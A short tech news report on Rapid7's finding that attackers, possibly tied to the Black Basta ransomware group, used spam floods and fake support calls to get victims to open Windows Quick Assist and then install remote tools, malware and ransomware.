TechNews May 16th, Security company Rapid7 recently issued a press release announcing that the built-in 'Quick Assist' app in Microsoft Windows has been abused by hackers. Hackers first obtained a batch of victim information, then bombarded the related victims' email with spam, and then called the email owner pretending to be a security company claiming to 'provide assistance', tricking users into communicating with hackers using the system's built-in remote management software, and then deeply invading the user's device.
The security company stated that the hackers involved may be members of the ransomware hacker group BlackBasta. Starting in mid-April, these hackers used phishing scams to deceive victims, then requested victims to press the shortcut keys CTRL+Win+Q to start the quick assist and enter a security code. Since the related function is integrated in Windows, it can also maintain the victim's trust.
After successfully controlling the victim's computer using the 'Quick Assist' app, hackers will download a series of batch files or ZIP compressed files through the cURL command, deploying remote management tools such as ScreenConnect, NetSupportManager, malicious programs QBot, penetration testing tool CobaltStrike, and various ransomware on the user's device. In some attacks, hackers also use OpenSSH to establish an SSH tunnel for continuous action in the victim's network environment.
TapTechNews noted that Microsoft introduced the 'Quick Assist' app in Windows 10, mainly for technicians to remotely assist users in troubleshooting over the internet. However, Microsoft first provided similar functionality in the Windows XP operating system, called 'Windows Remote Assistance', but hackers have only recently begun to abuse related functions for attacks.